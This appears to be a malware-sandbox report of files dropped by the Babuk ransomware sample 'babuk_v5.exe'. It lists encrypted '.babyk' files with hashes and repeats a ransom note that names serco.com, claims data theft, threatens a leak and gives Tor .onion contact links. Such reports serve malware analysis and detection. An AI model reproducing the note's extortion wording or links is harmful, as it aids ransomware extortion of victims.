                                                                            Preview: ....ps}V..r8.J..|3.4...2{..7...._..p....p\(4.9`.Dr...<y..D..y.ht.LM..%j(...E.N+..a...6\....<..O.....*>...l..\Y.S/.N.J.......L.t"H..Ge.MN..V/..!.k.$..<....n.....<.?...o...t+%.q.v..N.T.)-.>Fk.....p.a.d..8z../.......Pu)...&...v...Xr..y.Y.q)..0.<..X8?........).........?.......{.....].$..%@....4....d9.}5..*....]B...9.P.X7.J...}...)........vD.f3..3.C.......|.9O.WB.8n...qW.....A.1X3.4..U...^...4.\.9|.....9....Xaa...n.c.&IP.!.W....!....../..v.~...c...q.'.c.pB..%K.V.........]p.."%G.h....v.ihh.P.d...*6k./!.....&.}:..... .....||)..2hii.-..B...oI.."..;.o.*."......U"...;+..Ky..`PKd.B.k..#....z..uS@Z....a..E.7..-{......"b..0O...u...I....d..E{o/..N.Z.]F.....G.x......5.M.^..N.~..Ht..#$.'.<jf.M...z....7.<..-...G.NT\^.......r....Z$.T'..ZN....B.)...Z...vUY......T...u%.s6.O.....d......"Z9...0r......s.-r.Q3..b;.....K.}.[\...P...A.&.8h.h.I..........!5.,...#S.N.Qzo.c{ra4..^..=...v..j..B.X.V.,..%a.N._..pf....Q.b.......@.d.h...j...V..Ic[6...(.A.V.;..U...
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\settings.dat.LOG2.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.521503807490097
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlaJ3AJEBVWgffRKUo2grgoWa6miFQsXebXY1WCDz0NLUxNvEEn:q+OVWaZPo2grgmUXerY1RUNL0vtn
                                                                            MD5:D3FEADD9B4696E53244C1781F867E660
                                                                            SHA1:E6CDA1DE55B8AB714678B7FC5C08C981FA5F47E5
                                                                            SHA-256:7A483E0D51F12C26520FCBEEE21E84D9CF272F24EF7A9521321C71B07269D89D
                                                                            SHA-512:90277F104A82AD2B7941E2FA5C7A37AD09BEBEE81BE54AC506AE30A873FE1733470EAD00F2813360D67140DA9679E706C16E2434818C51B4217F5B3B65D831F7
                                                                            Malicious:false
                                                                            Preview: .......b.@.........7....D...B.....6;(wz:|..o..%.>...}.h#....r.|.[..N..3.e....O.d..uE......,4.d..v+..].....ha..{.l.j.N..zh(K.n.......choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.978506246956479
                                                                            Encrypted:false
                                                                            SSDEEP:96:aWEeSpcodiatMDaZJIvQz0d+hdrUULJc+7xcSKEP9p/Q3P4OV1O70+noh54R0MuF:up5da5IhFVcLE1p/Q/48c19KCw0iL
                                                                            MD5:A252897490131EBD1C1CD225C595B42F
                                                                            SHA1:AB09AFD13FED8B1FCDC51B9336EF2ED1556267DF
                                                                            SHA-256:0872AD404E32EDA863328D0034EA3C10301EA0C25DEEE0F04455308D3D9EF4F7
                                                                            SHA-512:468E0B07977EBAF198133BE4C3577F11F74E6F57FAB9AC163635E2C6DF1F436AF5025905FFB3C15F46A29C26149DBB9E47846869B4FD947F546B5A804B3B77B5
                                                                            Malicious:false
                                                                            Preview: ,.#..H....Dk.dM.b..W.O..7...-v....]E...2E!/..5{....pD}..-..M...G.w.N.X%K.Z..O......i.......F F+f._hc}...F.V.uG..o.s.f.[2.......CQ.`KB(...&..Su.Yg...A.|.q.N.:f.=.?q.n...C.=.../.....MHK..H.y.d......-.@t..%..g..rEqs..N$zN_...h..s.|.6X.\.[U.h>...-.4.=.......h........)x.......! .v..m0...f.[#.w....K~*..... ...Q..vNG.TRD..c=.-. ......Q..`.._.Ye.d.s...r+.._R+.....X.c..1....v>|.........\...j.'...z.!.c..c..k.@........\C....q.\,...G..of..`d.].....A[Y%.K...1..%....^...J.uL.7.......5.O.m.v.*......s...j#F..F....Ok......\....4..H.HG..m...>...g....{@.5oER.....e! ....A.N........[..1....m_.s\.....e.2.....-@.j.....~AL9......h]........).u.4....D...i.@Y.c..y..Z..%J./5kalL.Uj.....H.......<..pfY&.).v4..!......d.T...s.'.. .m.....{.J.Yu.<.jN......T........BdW.[.......kMi.W.x..}kf.Vc..|x.P.C..re?...}...z....-8^."`..p.9..\.~..U_...Z5.!......oe1.B<.N,.#w.n.h.c...eH.,.,.eyL.d.)._.....7..mS.(.Z..9..k.L?A).Y}n.tU..x.*.7B.@.,.[...y..j.....y4<.../.....{..8..0A;^.....X
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.525955071459524
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlndagB8KWHZPP1DTmi1KnDuIm8V7NZ0rzZ9AUdq+6dcbdEjvumLI/lGNLUxNvEE:NalJRP1DTV1KTm8V7Nyd9AEOcJEjWmL2
                                                                            MD5:7DC75F05EDB08691D10E54B68106C329
                                                                            SHA1:324ACA9AF07C6BDBDF9E89F94D07E631AF26AEA7
                                                                            SHA-256:F6B76BF659A278FC7DF87FF3051AE9F0970B8AF3DC736513D8F5BAAF5D1BF68B
                                                                            SHA-512:AE133E2E3855629F416935ADE5364C2E1E513C27850A71E246B75BB6DF9B3E7E625D67788A97AD295DB2E5C8E90F569CA1F7D45BE3FE795EB272B0F09AD74926
                                                                            Malicious:false
                                                                            Preview: ....k-7>A.B...X.k... ..D5.Jj.$..&..5......!A./....._..Y.mC.p.Vw.h.F....4h.i..UA......4.T.}-x./.....v...../">.T$.@.FJ.....?.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.97774844641408
                                                                            Encrypted:false
                                                                            SSDEEP:192:LSZv3hu5gtYyFioC36dzLxyjXR2EsEf2NVVPRlObS00Cx:LIYxOE69AjXRFsEf2N3Pn900I
                                                                            MD5:8ED03C1C27B0AA2F330B29A9FBFC9CBB
                                                                            SHA1:6E59533CAC678489CA059C7AB81F43333B885715
                                                                            SHA-256:F03E7DA355A562EFC58FE80A6990C902D7126A5C27BF4C1DE940E90B7CF4EE30
                                                                            SHA-512:7133C4D0B1F6DF21CCDD08B1963E7CC950F36E6D9CF9E33C9942A514ADCB7B3C31C18F1A2E314FA034C4A8B7A39F1E839E1BE66C5B50C2A4F89AF2FA0538F74C
                                                                            Malicious:false
                                                                            Preview: ..D..|^.8.....E....b......D.}.V..y.^&a..y..6.(n.......H2)..0.1...k..........I..v}u...oM._g)G.J.Gq...J3*.o.*6p...T...w..b@.......z...h BvA...@7...........f....E.*.....IO.{s...QZ*.7...9*....6.=a8..%.........{.....B...A.26..x.*.P:0....7.r.Q(..[s.t..3M..v.........g+..<Z..6.+,P'.2......4....1{.XH..IX.$......Qr..-.S......F;.oD..2...~8\-.%x....c./..b.l.#Xe.f)...|3............U,....Y.2^B.;..z.y....+.6...*.............*%Y.n..SL...4o......y\icE......6YA...G..!.......3....+(7#.^.B.LX...%...VD_.U.u...S..+..7.I$. .1.'.;=....m.6,b.H...wI...q..Ag&G.K{....Ro.^]..<Y..>..t.S.#W.A.a.....k.I.."..../..`....AQ......(~.eK.q+....?..xMm..n.....e...d.{j.....\.....TaH&.F.+.T..O...HB.....q.....D.r...V.=...<..qS#C.,fRq.$.k..=...HR.~...qx..K.u.`..V.....}^.B..y2r.:X..]..,........P..@....6+.r.}..N*,.."<+...~...+be..aF_..i...%..0e.K.o.......jm3......i....9r.Df...."..k..Vz..u..v..........-21c.7W...4Dr...aH.<u.&.+m..o.&.qB5..no../...q.A,.........)$........
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
